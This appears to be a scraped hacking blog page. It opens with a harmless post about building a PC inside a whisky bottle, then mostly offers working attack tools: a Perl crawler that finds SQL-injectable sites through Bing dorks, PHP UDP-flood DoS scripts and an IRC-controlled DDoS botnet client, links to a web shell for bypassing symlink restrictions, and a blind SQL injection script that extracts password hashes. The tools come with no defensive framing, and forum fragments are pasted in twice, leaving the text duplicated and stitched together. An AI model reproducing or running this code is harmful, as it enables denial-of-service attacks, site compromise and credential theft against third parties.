This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Saturday, 19 January 2013

How To Make A Whiskey PC

 

 

Intro

I already had a powerful computer setup so I wanted something more quiet, small and low power consumptioning to function as a basic home server. I love to tinker with hardware etc. so I wanted to make something quite unique for a case. I have seen many nice and creative cases before but none of them were made out of a bottle. In November I bought an industrial 3.5″ SBC board (with Socket370). For the project I selected a 1.5 litre Ballantine’s bottle for case. That was the proper size and shape for the task at hand.

Ballantine’s

Prepping the bottle



Cut
I tried to cut and drill couple of similar bottles at home but I realized that my tools are not good enough for it, then finaly a professional glass grinder man prepared the whisky bottle for me. He made two holes: one at the back of the bottle for CPU cooling and one at left side for put in the stuffing.

Hardware
I bought an Intel P3 733EB processor, a 256MB notebook RAM, a 40GB notebook HDD and finaly a 60W mini-ITX PSU. The RAM module is placed at the back side of the mobo. A compact flash card slot also situated there, so I could use it instead of IDE HDD.


Side panel
In the next step I made a new plexi side panel and I fixed the mobo for it together with the powerconnector and the power switch. The small piece of plexi at the left functions as a “lock”. It can be fixed by two small screws and it then holds the side panel in place.


PSU
I made new cabling for power switch, HDD LED and 12V power connector.


Installing the OS
During the OS installation I used a normal IDE cable to connect the HDD and CD-ROM. For normal use I connected the HDD with 44 pin mini-IDE cable so no separate power cable is needed. I put this all together in the office, because my son was born in December and I do not have free time at home anymore. At least during the day time so most of the mod was done at night…

Fitting it all inside


Almost there
HDD and PSU already installed inside the bottle. Now comes the tricky part on how to get the rest of the hardware components to fit.


Installation completed
The HDD and PSU panel were fixed in position with a double-sided self-adhesive tape. First I wanted to fix them with screws to be able to replace them easily, but I could not do it because of the very limited space inside and small „service window”.

Powered ON



Up and running


Posing


Posing
You may notice that the bottle cap is sitting on the table top on all these images.
At this point the cooling was not good enough yet. After half an hour the bottle was a bit warm so I disassembled it and glued an old VGA card cooler into the bottle neck to help the air flow out. Furthermore I drilled 6 additional holes at the side panel so now the fresh air can flow into the bottle at the big hole on the back side and through these small holes. I drilled out the bottle cap as well so at the first watch it seems the bottle is original, untouched. These little tweaks improved the cooling and the temperature came down.

Fan installed to bottle neck


Additional cooling holes on the side panel

In use



Serving
Since that time my Whisky PC is still working well and quietly in the corner of my living room. Perhaps I should start planning on making a cluster of these… Combine the fun of emptying the whiskey bottles with some good company and building a high calculation power cluster. ;)
Source: http://metku.net/index.html?path=mods/whiskypc/index_eng
Feel Awesome Liking This Article :D

Friday, 18 January 2013

Perl SQLi Crawler



#!/usr/bin/perl

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

###############
my $dork;
my $url;
my $i;
my $request;
my $useragent;
my $response;
my $start;
my $end;
my $result;
my $fl;
my $link;
my $req;
my $ua;
my $result2;
my $res;
my $save;
my $pages;
my $page;
my $choice;
##############
my @z;

print q{
     _ ____        _  
    | |  _ \      | | 
  __| | |_) | ___ | |_
 / _` |  _ < / _ \| __|
| (_| | |_) | (_) | |_
 \__,_|____/ \___/ \__|
                          
################################
##      / SQLi Crawler /      ##
##      Private Edition       ##
##      ~Coded by dbx~        ##
################################

};

MainMenu:

print "------------------------\n";
print "Enter [1] To Begin SQLi.\n";
print "Enter [2] To Exit.\n";
print "------------------------\n\n";
print "Your Choice: ";

chomp ($choice = <STDIN>);
print "\n";

if ($choice eq 1) {&sql_scan}
if ($choice eq 5) {die;}

sub sql_scan
{

print "[+] Enter Bing! dork: ";
chomp ($dork = <STDIN>);
print "\n";
print "[+] How Many Pages To Leech?: ";
chomp ($pages = <STDIN>);
print "\n";

$page = $pages.'1';

print "[~] Crawling...\n\n";

for ($i = 0; $i <= $page; $i=$i+11)
{

$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";

$request = HTTP::Request->new(GET => $url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
$result = $response->content;

$start = '<h3><a href="';
$end = '" onmousedown=';

while ($result =~ m/$start(.*?)$end/g)

{
     $fl = $1;
     $link = $fl."%27";
     $req = HTTP::Request->new(GET => $link);
     $ua = LWP::UserAgent->new();
     $res = $ua->request($req);
     $result2 = $res->content;

      if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
      {
          push @z, $link;
          print "[+] MySQL Vulnerable: $link\n\n";
      }

      elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
      {
          push @z, $link;
          print "[+] MsSQL Vulnerable: $link\n\n";
      }

      else {
         
              print "[-] $link <- Not Vulnerable\n\n";
      }
}

}
    print "Vulnerable Links:\n";
    print "-----------------------------------\n";
foreach (@z)
{
    print "$_ \n\n";
}
print "Save Into A Text File? (Y or N): ";
chomp ($save = <STDIN>);

if ($save eq 'Y')
{
    print "Saving File...\n\n";
    open(vuln_file, ">>Vulns.txt");
    foreach (@z)
    {
        print vuln_file "$_ \n";
    }
    close(vuln_file);
    print "File Saved!\n\n";
}
goto MainMenu;
}

PHP DDOS 1.8

  

    <?php
        $ip = $_SERVER['REMOTE_ADDR'];
        ?>

        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
        <html>

        <head>
            <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
            <meta name="author" content="">

            <title>PHP DoS, Coded by EXE</title>
        </head>
        <!-- PHP DOS, coded by EXE -->
        <style type="text/css">
        <!--
        body {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            font-style: normal;
            line-height: normal;
            color: #FFFFFF;
            background-color: #000000;
        }



        -->
        </style>
        <!-- PHP DOS, coded by EXE -->
        <body>
        <center><br><br>
        <img src="main.jpg"><br>
        <b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
        <form name="input" action="function.php" method="post">
        IP:
        <input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Time:
        <input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Port:
        <input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
        <br><br>
        <input type="submit" value="    Start the Attack--->    ">
        <br><br>
        <center>
        After initiating the DoS attack, please wait while the browser loads.
        </center>

        </form>
        </center>
        <!-- PHP DOS, coded by EXE -->
        </body>
        </html>


        funtion.php

        Code:

        <?php

        //=================================================
        //PHP DOS v1.8 (Possibly Stronger Flood Strength)
        //Coded by EXE
        //www.ZeroDayExile.com
        //=================================================

        $packets = 0;
        $ip = $_POST['ip'];
        $rand = $_POST['port'];
        set_time_limit(0);
        ignore_user_abort(FALSE);

        $exec_time = $_POST['time'];

        $time = time();
        print "Flooded: $ip on port $rand <br><br>";
        $max_time = $time+$exec_time;



        for($i=0;$i<65535;$i++){
                $out .= "X";
        }
        while(1){
        $packets++;
                if(time() > $max_time){
                        break;
                }
               
                $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
                if($fp){
                        fwrite($fp, $out);
                        fclose($fp);
                }
        }
        echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
        ?>

    Reply With Quote Reply With Quote
    11-15-2009, 12:30 PM #3
    z0mb13
    z0mb13 is offline
    Senior
    z0mb13's Avatar

    Join Date
        Nov 2009
    Posts
        252
    Total 'Thanks' Received by This User :
    0 For This Post
    1 Total

    Send a message via Yahoo to z0mb13

        maisih suka di pake dgn gw,v3n0m,edelweiss,aRiee,lingah itu kok

        dan hasil'a lumayan memuaskan

    Reply With Quote Reply With Quote
    11-15-2009, 12:34 PM #4
    alex_owners
    alex_owners is offline
    Junior Member
    alex_owners's Avatar

    Join Date
        Nov 2009
    Posts
        83
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Send a message via Yahoo to alex_owners
    PHP Ddos BOT

        izin d plajarin duluya k
        manatau pandai, hehe

    Reply With Quote Reply With Quote
    11-16-2009, 10:28 AM #5
    zuchri
    zuchri is offline
    Junior Member
    zuchri's Avatar

    Join Date
        Nov 2009
    Posts
        2
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Talking

        Quote Originally Posted by z0mb13 View Post
        Code:

        <?php


        /*


        PHP DDoS Bot
        Version 1.0
        [www.~censored~.org]


        */


        $server="1.3.3.7";
        $Port="6667";
        $nick="bot-";$willekeurig;
        $willekeurig=mt_rand(0,3);
        $nicknummer=mt_rand(100000,999999);
        $Channel="#WauShare";
        $Channelpass="ddos";
        $msg="Farewell.";

        set_time_limit(0);
        $loop = 0; $verbonden = 0;
        $verbinden = fsockopen($server, $Port);

        while ($read = fgets($verbinden,512)) {

        $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
        $read2 = explode(" ",$read);

        if ($loop == 0) {
        fputs($verbinden,"nick $nick$nicknummer\n\n");
        fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
        }

        if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

        if ($read2[1] == 251) {
        fputs($verbinden,"join $Channel $Channelpass\n");
        $verbonden++;
        }


        if (eregi("bot-op",$read)) {
        fputs($verbinden,"mode $Channel +o $read2[4]\n");
        }


        if (eregi("bot-deop",$read)) {
        fputs($verbinden,"mode $Channel -o $read2[4]\n");
        }

        if (eregi("bot-quit",$read)) {
        fputs($verbinden,"quit :$msg\n\n");
        break;
        }

        if (eregi("bot-join",$read)) {
        fputs($verbinden,"join $read2[4]\n");
        }

        if (eregi("bot-part",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        }


        if (eregi("ddos-udp",$read)) {
        fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
        $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
        if (!$fp)
        {
        //echo "$errstr ($errno)<br>\n"; //troep
        exit;
        }
        else
        {
        $char = "a";
        for($a = 0; $a < 9999999999999; $a++)
        $data = $data.$char;

        if(fputs ($fp, $data) )
        fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
        else
        fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
        }
        }

        if (eregi("ddos-tcp",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
        $server = $read2[4];
        $Port = $read2[5];

        for($sockets = 0; $sockets < $read2[6]; $sockets++)
        {
        $verbinden = fsockopen($server, $Port);
        }
        }

        if (eregi("ddos-http",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
        $Webserver = $read2[4];
        $Port = $read2[5];

        $Aanvraag = "GET / HTTP/1.1\r\n";
        $Aanvraag .= "Accept: */*\r\n";
        $Aanvraag .= "Accept-Language: nl\r\n";
        $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
        $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        $Aanvraag .= "Host: $read2[4]\r\n";
        $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

        for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
        {
        $DoS = fsockopen($Webserver, $Port);
        fwrite($DoS, $Aanvraag);
        fclose($DoS);
        }
        }
        $loop++;

        }
        ?>

PHP DDOS 1.0

       

<?php


        /*


        PHP DDoS Bot
        Version 1.0
        [www.~censored~.org]


        */


        $server="1.3.3.7";
        $Port="6667";
        $nick="bot-";$willekeurig;
        $willekeurig=mt_rand(0,3);
        $nicknummer=mt_rand(100000,999999);
        $Channel="#WauShare";
        $Channelpass="ddos";
        $msg="Farewell.";

        set_time_limit(0);
        $loop = 0; $verbonden = 0;
        $verbinden = fsockopen($server, $Port);

        while ($read = fgets($verbinden,512)) {

        $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
        $read2 = explode(" ",$read);

        if ($loop == 0) {
        fputs($verbinden,"nick $nick$nicknummer\n\n");
        fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
        }

        if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

        if ($read2[1] == 251) {
        fputs($verbinden,"join $Channel $Channelpass\n");
        $verbonden++;
        }


        if (eregi("bot-op",$read)) {
        fputs($verbinden,"mode $Channel +o $read2[4]\n");
        }


        if (eregi("bot-deop",$read)) {
        fputs($verbinden,"mode $Channel -o $read2[4]\n");
        }

        if (eregi("bot-quit",$read)) {
        fputs($verbinden,"quit :$msg\n\n");
        break;
        }

        if (eregi("bot-join",$read)) {
        fputs($verbinden,"join $read2[4]\n");
        }

        if (eregi("bot-part",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        }


        if (eregi("ddos-udp",$read)) {
        fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
        $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
        if (!$fp)
        {
        //echo "$errstr ($errno)<br>\n"; //troep
        exit;
        }
        else
        {
        $char = "a";
        for($a = 0; $a < 9999999999999; $a++)
        $data = $data.$char;

        if(fputs ($fp, $data) )
        fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
        else
        fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
        }
        }

        if (eregi("ddos-tcp",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
        $server = $read2[4];
        $Port = $read2[5];

        for($sockets = 0; $sockets < $read2[6]; $sockets++)
        {
        $verbinden = fsockopen($server, $Port);
        }
        }

        if (eregi("ddos-http",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
        $Webserver = $read2[4];
        $Port = $read2[5];

        $Aanvraag = "GET / HTTP/1.1\r\n";
        $Aanvraag .= "Accept: */*\r\n";
        $Aanvraag .= "Accept-Language: nl\r\n";
        $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
        $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        $Aanvraag .= "Host: $read2[4]\r\n";
        $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

        for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
        {
        $DoS = fsockopen($Webserver, $Port);
        fwrite($DoS, $Aanvraag);
        fclose($DoS);
        }
        }
        $loop++;

        }
        ?>

    Reply With Quote Reply With Quote
    11-15-2009, 12:02 PM #2
    alex_owners
    alex_owners is offline
    Junior Member
    alex_owners's Avatar

    Join Date
        Nov 2009
    Posts
        83
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Send a message via Yahoo to alex_owners
    PHP DDoS Bot Version 1.0

        beuh mantap kk
        btw ampuh ngk ni

        ni kk php ddos v.1.8 tp ngk ampuh

        index.php
        Code:

        <?php
        $ip = $_SERVER['REMOTE_ADDR'];
        ?>

        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
        <html>

        <head>
            <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
            <meta name="author" content="">

            <title>PHP DoS, Coded by EXE</title>
        </head>
        <!-- PHP DOS, coded by EXE -->
        <style type="text/css">
        <!--
        body {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            font-style: normal;
            line-height: normal;
            color: #FFFFFF;
            background-color: #000000;
        }



        -->
        </style>
        <!-- PHP DOS, coded by EXE -->
        <body>
        <center><br><br>
        <img src="main.jpg"><br>
        <b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
        <form name="input" action="function.php" method="post">
        IP:
        <input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Time:
        <input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Port:
        <input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
        <br><br>
        <input type="submit" value="    Start the Attack--->    ">
        <br><br>
        <center>
        After initiating the DoS attack, please wait while the browser loads.
        </center>

        </form>
        </center>
        <!-- PHP DOS, coded by EXE -->
        </body>
        </html>


        funtion.php

        Code:

        <?php

        //=================================================
        //PHP DOS v1.8 (Possibly Stronger Flood Strength)
        //Coded by EXE
        //www.ZeroDayExile.com
        //=================================================

        $packets = 0;
        $ip = $_POST['ip'];
        $rand = $_POST['port'];
        set_time_limit(0);
        ignore_user_abort(FALSE);

        $exec_time = $_POST['time'];

        $time = time();
        print "Flooded: $ip on port $rand <br><br>";
        $max_time = $time+$exec_time;



        for($i=0;$i<65535;$i++){
                $out .= "X";
        }
        while(1){
        $packets++;
                if(time() > $max_time){
                        break;
                }
               
                $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
                if($fp){
                        fwrite($fp, $out);
                        fclose($fp);
                }
        }
        echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
        ?>

    Reply With Quote Reply With Quote
    11-15-2009, 12:30 PM #3
    z0mb13
    z0mb13 is offline
    Senior
    z0mb13's Avatar

    Join Date
        Nov 2009
    Posts
        252
    Total 'Thanks' Received by This User :
    0 For This Post
    1 Total

    Send a message via Yahoo to z0mb13

        maisih suka di pake dgn gw,v3n0m,edelweiss,aRiee,lingah itu kok

        dan hasil'a lumayan memuaskan

    Reply With Quote Reply With Quote
    11-15-2009, 12:34 PM #4
    alex_owners
    alex_owners is offline
    Junior Member
    alex_owners's Avatar

    Join Date
        Nov 2009
    Posts
        83
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Send a message via Yahoo to alex_owners
    PHP Ddos BOT

        izin d plajarin duluya k
        manatau pandai, hehe

    Reply With Quote Reply With Quote
    11-16-2009, 10:28 AM #5
    zuchri
    zuchri is offline
    Junior Member
    zuchri's Avatar

    Join Date
        Nov 2009
    Posts
        2
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Talking

        Quote Originally Posted by z0mb13 View Post
        Code:

        <?php


        /*


        PHP DDoS Bot
        Version 1.0
        [www.~censored~.org]


        */


        $server="1.3.3.7";
        $Port="6667";
        $nick="bot-";$willekeurig;
        $willekeurig=mt_rand(0,3);
        $nicknummer=mt_rand(100000,999999);
        $Channel="#WauShare";
        $Channelpass="ddos";
        $msg="Farewell.";

        set_time_limit(0);
        $loop = 0; $verbonden = 0;
        $verbinden = fsockopen($server, $Port);

        while ($read = fgets($verbinden,512)) {

        $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
        $read2 = explode(" ",$read);

        if ($loop == 0) {
        fputs($verbinden,"nick $nick$nicknummer\n\n");
        fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
        }

        if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

        if ($read2[1] == 251) {
        fputs($verbinden,"join $Channel $Channelpass\n");
        $verbonden++;
        }


        if (eregi("bot-op",$read)) {
        fputs($verbinden,"mode $Channel +o $read2[4]\n");
        }


        if (eregi("bot-deop",$read)) {
        fputs($verbinden,"mode $Channel -o $read2[4]\n");
        }

        if (eregi("bot-quit",$read)) {
        fputs($verbinden,"quit :$msg\n\n");
        break;
        }

        if (eregi("bot-join",$read)) {
        fputs($verbinden,"join $read2[4]\n");
        }

        if (eregi("bot-part",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        }


        if (eregi("ddos-udp",$read)) {
        fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
        $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
        if (!$fp)
        {
        //echo "$errstr ($errno)<br>\n"; //troep
        exit;
        }
        else
        {
        $char = "a";
        for($a = 0; $a < 9999999999999; $a++)
        $data = $data.$char;

        if(fputs ($fp, $data) )
        fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
        else
        fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
        }
        }

        if (eregi("ddos-tcp",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
        $server = $read2[4];
        $Port = $read2[5];

        for($sockets = 0; $sockets < $read2[6]; $sockets++)
        {
        $verbinden = fsockopen($server, $Port);
        }
        }

        if (eregi("ddos-http",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
        $Webserver = $read2[4];
        $Port = $read2[5];

        $Aanvraag = "GET / HTTP/1.1\r\n";
        $Aanvraag .= "Accept: */*\r\n";
        $Aanvraag .= "Accept-Language: nl\r\n";
        $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
        $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        $Aanvraag .= "Host: $read2[4]\r\n";
        $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

        for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
        {
        $DoS = fsockopen($Webserver, $Port);
        fwrite($DoS, $Aanvraag);
        fclose($DoS);
        }
        }
        $loop++;

        }
        ?>

Bypass Forbidden Symlink

cara bypass symlink manual mengunakan cgi-telnet shell

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMgzwu1euXGoNPpLUntHotISy4ZcYsna1rlfzBVXgBY2scTAUHgcimwcaS4K6g2oCRmj98TK6b2aXUxi4_NSS47krCrpGyEHXa_Ux58Dk9tySLHJJ18IWvH1recVXOy768k4xqdroWaGti/s1600/symlink.png


Mengunakan "command sahaja"

Jom tengok



http://tzuae.com/logs/cgi.txt <-- cgi-telnet shell boleh download disini

http://idproducts.us/neh/htaccess.txt <-- htaccess code

Itu sahaja .

Maksud Error Di Website


http://www.benzworld.org/forums/attachments/unimog/305117d1272423141-error-404-error404.jpg
Setiap number ada maksut maksutnya tersediri . kalau korang nak tahu . korang baca di bawah :

400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Precondition Failed
413 Request Entity Too Large
414 Request-URI Too Long
415 Unsupported Media Type
Server Error 5xx
500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Gateway Timeout
505 HTTP Version Not Supported
Successful 2xx
200 OK
201 Created
202 Accepted
203 Non-Authoritative Information
204 No Content
205 Reset Content
206 Partial Content

Auto Blind SQL Injection



<?php



echo "\r\n";echo "\r\t\r\t##\r\n";echo "\r\t\r\t#  Auto Blind SQL injector   #\r\n";echo "\r\t\r\t#  By The Jock[e]r #\r\n";echo "\r\t\r\t##\r\n";



echo "\r\nURL target :";$page = trim(fgets(STDIN));//Wait a string and valid url before continue



if(filter_var($page, FILTER_VALIDATE_URL) !== true)//Test if var $page is correct URL{    echo "You entered an incorrect URL the program going to shut down automatically.";    exit;}



echo "\r\nDisplayed word :";$pattern = trim(fgets(STDIN));//Wait a string before continue



echo "\r\nColumn target :";$column = trim(fgets(STDIN));//Wait a string before continue



$lenght_max = 98;



echo "\r\n[+]Retrieving password's length...\r\n";



for($i=0;$i<=$lenght_max;$i++){    $page2 = file_get_contents($page.urlencode("\" and length($column)=$i-- -"));



    if(preg_match("#$pattern#",$page2))    {        $lenght = $i;        echo "\r\nThe password's length is $lenght.\r\n";        break;    }}



$final_pass = "";



$char_min = 20;$char_max = 140;



$char = $char_min;$x = 1;



echo "\r\n[+]Retrieving password's hash...\r\n";



echo "\r\nFinal password is : ";



while($x <= $lenght) {    $page3 = file_get_contents($page.urlencode("\" and lower(substring($column,$x,1)=char($char))-- -"));    if(preg_match("#$pattern#", $page3))    {        $final_pass.= strtolower(chr($char));        echo strtolower(chr($char));        $x ++;        $char = $char_min;    }    $char++;}



$lenght_pass = $lenght;



echo "\r\n\r\n[+]Retrieving hash type...\r\n";



if($lenght_pass == 40){    $type = "sha1";}elseif ($lenght_pass == 32) {    $type = "md5";}elseif ($lenght_pass == 13) {



    $type = "DES(Unix)";}elseif (preg_match("#\\$1\\$#",$final_pass) AND $lenght_pass == 34) {



    $type = "MD5(Unix)";}elseif (preg_match("#\\\$apr1\\$#",$final_pass) AND $lenght_pass == 37) {



    $type = "MD5(APR)";}elseif (preg_match("#\\\$h\\$#",$final_pass) AND $lenght_pass == 34) {



    $type = "MD5(phpBB3)";}elseif (preg_match("#\\\$p\\$#",$final_pass) AND $lenght_pass == 34) {



    $type = "MD5(Wordpress)";}



elseif ($lenght_pass == 16) {



    $type = "MySQL";}elseif (preg_match("#\\\*#", $final_pass) AND $lenght_pass == 41) {



    $type = "MySQL5";    $final_pass = strtoupper($final_pass);}elseif (preg_match("#\\$5\\$#", $final_pass) AND $lenght_pass == 55) {



    $type = "SHA-256(Unix)";}elseif(preg_match("#\\$6\\$#", $final_pass) AND $lenght_pass == 98){    $type = "SHA-512(Unix)";}



echo "\r\nHash type for $final_pass is ".$type.".\r\n";



?>